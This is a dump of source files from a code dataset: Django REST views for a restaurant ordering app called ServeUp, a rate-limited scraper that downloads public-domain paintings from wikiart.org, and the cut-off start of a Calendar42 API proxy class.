'id_naslov': id_address, 'ocena': request.data['ocena']}\n\n serializer = RestavracijaSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n response['status'] = 1\n response['description'] = \"Restaurant added to admin\"\n return Response(response, status=status.HTTP_201_CREATED)\n else:\n 
response['status'] = 0\n            response['description'] = serializer.errors\n            return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n    @action(detail=False, methods=['GET'])\n    def fetch_qr(self, request):\n        \"\"\"\n        The function receives the id_restavracija query parameter.\n        Returns all QR codes for the given id_restavracija.\n        Return values:\n        status: 0 || 1\n        data: JSON array with QR codes\n        \"\"\"\n\n        get_params = request.query_params\n        response = {}\n        return_data = []\n\n        try:\n            id_restavracija = get_params['id_restavracija']\n        except KeyError:\n            response['status'] = 0\n            response['description'] = \"Missing id, add ?id_restavracija=x to the call\"\n            return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n        data = Mize.objects.filter(id_restavracija=id_restavracija)\n        data = MizeSerializer(data, many=True).data\n\n        for obj in data:\n            id_miza = obj['id_miza']\n            if id_miza not in return_data:\n                return_data.append(id_miza)\n\n        response['status'] = 1\n        response['data'] = return_data\n        return Response(response, status=status.HTTP_200_OK)\n\n    @action(detail=False, methods=['POST'])\n    def add_table(self, request):\n        response = {}\n        data = request.data\n\n        try:\n            id_restavracija = data['id_restavracija']\n            qr = data['qr']\n        except KeyError as e:\n            response['status'] = 0\n            response['description'] = \"Missing key data \" + str(e)\n            return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n        if not qr:\n            response['status'] = 0\n            response['description'] = \"Missing QR data\"\n            return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n        table = {\n            'id_restavracija': id_restavracija,\n            'id_miza': qr\n        }\n\n        serializer = MizeSerializer(data=table)\n        if serializer.is_valid():\n            serializer.save()\n            response['status'] = 1\n            response['description'] = \"Successfully added table to restaurant\"\n            return Response(response, status=status.HTTP_200_OK)\n        else:\n            response['status'] = 0\n            response['description'] = serializer.errors\n            return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass TipRestavracijeViewSet(viewsets.ModelViewSet):\n    \"\"\"\n    ViewSet provides the 'list', 'create', 'retrieve', 'update' and 'destroy' actions.\n\n    Additional actions can be added using the '@action()' decorator; the default\n    method is GET, and POST can be added via the 'methods' argument.\n    \"\"\"\n    serializer_class = TipRestavracijeSerializer\n    queryset = TipRestavracije.objects.all()\n    model = TipRestavracije\n\n\nclass AdminUporabnikViewSet(mixins.ListModelMixin, viewsets.GenericViewSet):\n    serializer_class = AdminUporabnikSerializer\n    queryset = AdminUporabnik.objects.all()\n    model = AdminUporabnik\n\n    @action(detail=False, methods=['POST'])\n    def login(self, request):\n        \"\"\"\n        The function receives JSON data with the email and the password. 
If the user exists and the password is\n        correct, we return the id of the restaurant the user manages; if they do not manage any restaurant, None is returned.\n        Return values\n        status: 0 - Error, 1 - OK\n        description: Short description of the error or confirmation of the desired action\n        id_restavracija: If status 1, id of the restaurant or None\n        \"\"\"\n        response = {}\n\n        # First try to get the user\n        try:\n            user = AdminUporabnik.objects.get(email=request.data['email'])\n        except AdminUporabnik.DoesNotExist:\n            user = None\n\n        # If the user exists, check the password\n        if user is not None:\n            password = request.data['password']\n            match = check_password(password, user.password)\n            if not match:\n                response['status'] = 0\n                response['description'] = \"Password does not match\"\n                return Response(response, status=status.HTTP_401_UNAUTHORIZED)\n            else:\n                query = Restavracija.objects.all().filter(id_admin=user.id)\n                data = RestavracijaSerializer(query, many=True).data\n\n                if len(data) != 0:\n                    id_restavracija = data[0]['id_restavracija']\n                else:\n                    id_restavracija = None\n\n                response['status'] = 1\n                response['description'] = \"Username and password match\"\n                response['id_restavracija'] = id_restavracija\n                return Response(response, status=status.HTTP_200_OK)\n        else:\n            response['status'] = 0\n            response['description'] = \"Username does not exist\"\n            return Response(response, status=status.HTTP_401_UNAUTHORIZED)\n\n    @action(detail=False, methods=['POST'])\n    def register(self, request):\n        \"\"\"\n        The function receives JSON data with the email and the password.\n        If the input data is valid, it creates a new admin user.\n        Return values\n        status: 0 - Error, 1 - OK\n        description: Short description of the error or confirmation of the desired action\n        \"\"\"\n        serializer = AdminUporabnikSerializer(data=request.data)\n        response = {}\n        if serializer.is_valid():\n            serializer.save()\n            response['status'] = 1\n            response['description'] = \"New user created\"\n            return Response(response, status=status.HTTP_201_CREATED)\n        else:\n            email_error = (\"Email - \" + serializer.errors['email'][0]) if 'email' in serializer.errors else \"\"\n            password_error = (\n                \"Password - \" + serializer.errors['password'][0]) if 'password' in serializer.errors else \"\"\n\n            response['status'] = 0\n            response['description'] = \"Error: \" + email_error + password_error\n            return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass UporabnikViewSet(mixins.ListModelMixin, viewsets.GenericViewSet):\n    serializer_class = UporabnikSerializer\n    queryset = Uporabnik.objects.all()\n    model = Uporabnik\n\n    @action(detail=False, methods=['POST'])\n    def get_orders(self, request):\n        \"\"\"\n        Return all orders and meal data for the given user\n        \"\"\"\n        response = {}\n        try:\n            id_uporabnik = request.data['id_uporabnik']\n        except KeyError:\n            id_uporabnik = None\n\n        try:\n            limit = int(request.data['num_orders'])\n        except (KeyError, ValueError):  # missing or non-numeric, fall back to the default\n            limit = 10\n\n        if id_uporabnik is None:\n            response['status'] = 0\n            response['description'] = \"Error: Please input the user id\"\n            return Response(response, status=status.HTTP_400_BAD_REQUEST)\n        else:\n            response['status'] = 1\n            response['description'] = \"Orders for user: \" + str(id_uporabnik)\n            response['orders'] = get_orders(id_uporabnik, limit)\n            return Response(response, status=status.HTTP_200_OK)\n\n    @action(detail=False, methods=['POST'])\n    def register(self, request):\n        \"\"\"\n        The function receives JSON data with the token of the new user.\n        If the input data is valid, it creates a new user.\n        Return values\n        status: 0 - Error, 1 - New user created, 2 - User already 
registered\n        description: Short description of the error or confirmation of the desired action\n        \"\"\"\n        try:\n            user = Uporabnik.objects.get(id_uporabnik=request.data['id_uporabnik'])\n        except Uporabnik.DoesNotExist:\n            user = None\n\n        response = {}\n        if user is None:\n            serializer = UporabnikSerializer(data=request.data)\n            if serializer.is_valid():\n                serializer.save()\n                response['status'] = 1\n                response['description'] = \"New user created\"\n                return Response(response, status=status.HTTP_201_CREATED)\n            else:\n                id_error = \"ID: \" + serializer.errors['id_uporabnik'][0]\n                response['status'] = 0\n                response['description'] = \"Error: \" + id_error\n                return Response(response, status=status.HTTP_400_BAD_REQUEST)\n        else:\n            response['status'] = 2\n            response['description'] = \"User already registered\"\n            return Response(response, status=status.HTTP_200_OK)\n\n    @action(detail=False, methods=['POST'])\n    def check_in(self, request):\n        # TODO: Implement check-in from the user\n        response = {}\n        try:\n            id_narocila = request.data['id_narocilo']\n            qr = request.data['qr']\n        except KeyError:\n            response['status'] = 0\n            response['description'] = \"Error: Missing either id_narocilo or qr\"\n            return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n        # noinspection PyBroadException\n        try:\n            order = Narocilo.objects.get(id_narocila=id_narocila)\n            order_id_restaurant = order.id_restavracija\n        except Exception:\n            response['status'] = 0\n            response['description'] = \"Could not retrieve order {}\".format(id_narocila)\n            return Response(response, status=status.HTTP_503_SERVICE_UNAVAILABLE)\n\n        try:\n            Mize.objects.get(id_restavracija=order_id_restaurant, id_miza=qr)\n        except Mize.DoesNotExist:\n            response['status'] = 0\n            response['description'] = \"Error: Restaurant ID and QR do not match for the provided order\"\n            return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n        data = model_to_dict(order)\n        data[\"checked_in\"] = True\n        data[\"id_miza\"] = qr\n\n        serializer = NarociloSerializer(data=data, instance=order)\n        if serializer.is_valid():\n            serializer.save()\n            # Add the order to the checked_in array, used by the refresh API call\n            order_dict = {'id_narocila': order.id_narocila, 'qr': qr,\n                          'id_restavracija': order.id_restavracija.id_restavracija}\n            add_checked_in_order(order_dict)\n\n            response['status'] = 1\n            response['description'] = \"Successfully checked in order\"\n            return Response(response, status=status.HTTP_200_OK)\n        else:\n            response['status'] = 0\n            response['description'] = serializer.errors\n            return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass JedViewSet(mixins.ListModelMixin, viewsets.GenericViewSet):\n    serializer_class = JedSerializer\n    queryset = Jed.objects.all()\n    model = Jed\n\n    def list(self, request, *args, **kwargs):\n        return_data = defaultdict(list)\n        get_params = request.query_params\n\n        try:\n            id_restavracija = get_params['id_restavracija']\n        except KeyError:\n            response = {\n                'status': 0,\n                'description': \"Missing id, add ?id_restavracija=x to the call\"\n            }\n            return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n        meal_types = JedilniList.objects.all()\n        meal_types = JedilniListSerializer(meal_types, many=True).data\n        meal_types = {x['id_jedilni_list']: x['vrsta'] for x in meal_types}  # Convert the list of OrderedDicts to a plain dict\n\n        meals = Jed.objects.filter(id_restavracija=id_restavracija)\n        meals = JedSerializer(meals, many=True).data\n\n        for meal in meals:\n            typ = meal_types[meal['id_jedilni_list']]\n            return_data[typ].append({\n                'id_jed': meal['id_jed'],\n                'ime_jedi': meal['ime_jedi'],\n                
'opis_jedi': meal['opis_jedi'],\n 'cena': meal['cena'],\n 'kolicina': 1\n })\n\n return Response(return_data, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['POST'])\n def new_meal(self, request):\n \"\"\"\n Create new meal\n \"\"\"\n serializer = JedSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n response = {'status': 1, 'description': \"New meal created\"}\n return Response(response, status=status.HTTP_201_CREATED)\n else:\n response = {'status': 0, 'description': \"Could not create meal\"}\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n", "sub_path": "ServeUp/Views/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 25251, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 11, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 11, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 39, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 39, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 39, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 71, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 71, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 71, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 88, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 88, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 88, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 95, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 95, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 95, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 73, "usage_type": "call"}, {"api_name": "rest_framework.utils.json.load", "line_number": 105, "usage_type": "call"}, {"api_name": "rest_framework.utils.json", "line_number": 105, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 111, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 111, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 111, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 121, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 121, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 121, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 125, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_503_SERVICE_UNAVAILABLE", "line_number": 125, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 125, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 97, "usage_type": "call"}, {"api_name": "rest_framework.utils.json.load", "line_number": 136, "usage_type": "call"}, {"api_name": "rest_framework.utils.json", "line_number": 136, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 151, 
"usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 151, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 151, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 156, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 156, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 156, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 168, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 168, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 168, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 176, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 176, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 176, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 180, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 180, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 180, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 127, "usage_type": "call"}, {"api_name": "django.forms.models.model_to_dict", "line_number": 187, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 193, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 193, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 193, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 200, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 200, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 200, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 204, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 204, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 204, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 182, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 207, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 207, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 237, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 237, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 237, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 240, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 240, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 240, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 217, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 283, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 283, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 283, "usage_type": "name"}, {"api_name": 
"rest_framework.response.Response", "line_number": 293, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 293, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 293, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 307, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 307, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 307, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 311, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 311, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 311, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 242, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 332, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 332, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 332, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 344, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 344, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 344, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 313, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 357, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 357, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 357, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 362, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 362, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 362, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 374, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 374, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 374, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 378, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 378, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 378, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 346, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 381, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 381, "usage_type": "name"}, {"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 393, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 393, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 393, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 393, "usage_type": "name"}, {"api_name": "django.contrib.auth.hashers.check_password", "line_number": 419, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 423, "usage_type": "call"}, {"api_name": 
"rest_framework.status.HTTP_401_UNAUTHORIZED", "line_number": 423, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 423, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 436, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 436, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 436, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 440, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_401_UNAUTHORIZED", "line_number": 440, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 440, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 398, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 457, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 457, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 457, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 465, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 465, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 465, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 442, "usage_type": "call"}, {"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 468, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 468, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 468, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 468, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 492, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 492, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 492, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 497, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 497, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 497, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 473, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 520, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 520, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 520, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 525, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 525, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 525, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 529, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 529, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 529, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 499, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 541, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", 
"line_number": 541, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 541, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 550, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_503_SERVICE_UNAVAILABLE", "line_number": 550, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 550, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 557, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 557, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 557, "usage_type": "name"}, {"api_name": "django.forms.models.model_to_dict", "line_number": 559, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 573, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 573, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 573, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 577, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 577, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 577, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 531, "usage_type": "call"}, {"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 580, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 580, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 580, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 580, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 596, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 596, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 596, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 615, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 615, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 615, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 626, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 626, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 626, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 629, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 629, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 629, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 617, "usage_type": "call"}]}
+{"seq_id": "74423526", "text": "import urllib\nimport urllib.request\nimport re\nfrom bs4 import BeautifulSoup\nimport time\nimport os\n\nfile_path = \"modern_paintings\"\nos.makedirs(file_path, exist_ok=True)\n\ndef url_open(url):\n req = urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0'})\n retrycount = 0\n s = None\n while s is None:\n try:\n s = urllib.request.urlopen(req,timeout=50).read()\n except Exception as e:\n print(str(e))\n retrycount+=1\n if retrycount > 10:\n raise\n time.sleep(10)\n\n return BeautifulSoup(s, \"lxml\")\n\ndef urlretrieve(image_url, save_path):\n retrycount = 0\n s = None\n while s is None:\n try:\n s = urllib.request.urlretrieve(image_url, save_path)\n except Exception as e:\n print(str(e))\n retrycount+=1\n if retrycount > 10:\n raise\n time.sleep(10)\n\ndef get_images(url):\n print(url)\n genre_soup = url_open(url)\n artist_list_main = genre_soup.find(\"main\")\n lis = artist_list_main.find_all(\"li\")\n\n # for each list element\n for li in lis: \n born = 0\n died = 0\n\n # get the date range\n for line in li.text.splitlines():\n if line.startswith(\",\") and \"-\" in line:\n parts = line.split('-')\n if len(parts) == 2:\n born = int(re.sub(\"[^0-9]\", \"\",parts[0]))\n died = int(re.sub(\"[^0-9]\", \"\",parts[1]))\n\n # look for artists who may have created work that could in public domain\n if born>1800 and died>0 and died<1978:\n link = li.find(\"a\")\n artist = link.attrs[\"href\"]\n\n # get the artist's main page\n artist_url = base_url + artist\n artist_soup = url_open(artist_url)\n\n # only look for artists with the word modern on their main page\n if \"modern\" in artist_soup.text.lower():\n print(artist + \" \" + str(born) + \" - \" + str(died))\n\n # get the artist's web page for the artwork\n url = base_url + artist + '/all-works/text-list'\n artist_work_soup = url_open(url)\n\n # get the main section\n artist_main = artist_work_soup.find(\"main\")\n image_count = 0\n artist_name = artist.split(\"/\")[2]\n os.makedirs(file_path + \"/\" + artist_name, exist_ok=True)\n\n # get the list of artwork\n lis = artist_main.find_all(\"li\")\n\n # for each list element\n for li in lis:\n link = li.find(\"a\")\n\n if link != None:\n painting = link.attrs[\"href\"]\n\n # get the painting\n url = base_url + painting\n print(url)\n\n try:\n painting_soup = url_open(url)\n\n except:\n print(\"error retreiving page\")\n continue\n\n # check the copyright\n if \"Public domain\" in painting_soup.text:\n\n # get the url\n og_image = painting_soup.find(\"meta\", {\"property\":\"og:image\"})\n image_url = og_image[\"content\"].split(\"!\")[0] # ignore the !Large.jpg at the end\n print(image_url)\n\n parts = url.split(\"/\")\n painting_name = parts[-1]\n save_path = file_path + \"/\" + artist_name + \"/\" + painting_name + \".jpg\"\n\n #download the file\n try:\n print(\"downloading to \" + save_path)\n time.sleep(0.2) # try not to get a 403 \n urlretrieve(image_url, save_path)\n image_count = image_count + 1\n except Exception as e:\n print(\"failed downloading \" + image_url, e)\n\nbase_url = \"https://www.wikiart.org\"\nurls = []\nfor c in range(ord('a'), ord('z') + 1):\n char = chr(c)\n artist_list_url = base_url + \"/en/Alphabet/\" + char + \"/text-list\"\n urls.append(artist_list_url)\n\nprint(urls)\n\nfrom concurrent.futures import ThreadPoolExecutor\nexecutor = None\nwith ThreadPoolExecutor(max_workers = 16) as executor:\n ex = executor\n executor.map(get_images, urls)\n ", "sub_path": "download.py", "file_name": "download.py", "file_ext": 
"py", "file_size_in_byte": 3991, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.makedirs", "line_number": 9, "usage_type": "call"}, {"api_name": "urllib.request.Request", "line_number": 12, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 12, "usage_type": "attribute"}, {"api_name": "urllib.request.urlopen", "line_number": 17, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 17, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 23, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 25, "usage_type": "call"}, {"api_name": "urllib.request.urlretrieve", "line_number": 32, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 32, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 56, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 57, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 80, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 118, "usage_type": "call"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 135, "usage_type": "call"}]}
+{"seq_id": "596506285", "text": "import logging\r\nimport requests\r\n\r\nfrom apiproxy import constants\r\nfrom .exceptions import LoggedDetailsAPIException\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\nclass APIActionCaller():\r\n\t\"\"\"Abstract class which must be inherited to handle a call to a Calendar42 API action\r\n\t\r\n\tThe abstract methods to implement are:\r\n\t* extract_data()\r\n\t* get_relative_url()\r\n\t\"\"\"\r\n\t\r\n\tdef __init__(self, token):\r\n\t\t\"\"\"\r\n\t\t@param {str} token\tThe authentication token to use when calling the Calendar42 API\r\n\t\t\"\"\"\r\n\t\tself._token = token\r\n\t\r\n\tdef call(self, *args, **kwargs):\r\n\t\t\"\"\"Calls the Calendar42 API and returns the response\r\n\t\tParameters (if any) are forwarded to self.get_relative_url(), which may need some runtime data to compute the URL\r\n\t\t\r\n\t\t@return\t{dict}\tThe JSON API response\r\n\t\t\"\"\"\r\n\t\t\r\n\t\t# Call the Calendar42 API\r\n\t\tfull_url = constants.CALENDAR42_API_BASE_URL + self.get_relative_url(*args, **kwargs)\r\n\t\t\r\n\t\theaders = {\r\n\t\t\t'Accept': 'application/json',\r\n\t\t\t'Content-type': 'application/json',\r\n\t\t\t'Authorization': 'Token %s' % 